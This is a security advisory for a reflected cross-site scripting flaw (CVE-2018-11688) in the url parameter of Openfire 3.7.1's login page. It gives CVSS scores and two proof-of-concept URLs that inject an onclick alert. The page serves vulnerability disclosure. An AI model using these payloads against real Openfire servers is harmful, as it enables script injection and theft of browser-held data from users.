Ignite Realtime Openfire 3.7.1 Cross Site Scripting

2018.06.06

Credit: Yavuz Atlas

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2018-11688

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

I. VULNERABILITY
-------------------------
Ignite Realtime Openfire Version 3.7.1 Reflected Cross Site Scripting
II. CVE REFERENCE
-------------------------
CVE-2018-11688
III. VENDOR HOMEPAGE
-------------------------
https://www.igniterealtime.org/projects/openfire/
IV. DESCRIPTION
-------------------------
url parameter at Openfire Version 3.7.1 has a reflected cross-site
scripting vulnerability. A successful exploit could allow the attacker
to execute arbitrary script code in the context of the affected site
and allow the attacker to access sensitive browser-based information.
V. PROOF OF CONCEPT
-------------------------
http://domain.net:9090/login.jsp?url=a"onclick="alert(1)
http://domain.net:9090/login.jsp?url=a%22onclick=%22alert(1)
VI. REFERENCES
-------------------------
https://vulmon.com/vulnerabilitydetails?qid=CVE-2018-11688
VII. CREDIT
-------------------------
Yavuz Atlas - @yavuzatlas_
http://www.biznet.com.tr/biznet-guvenlik-duyurulari

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Ignite Realtime Openfire 3.7.1 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.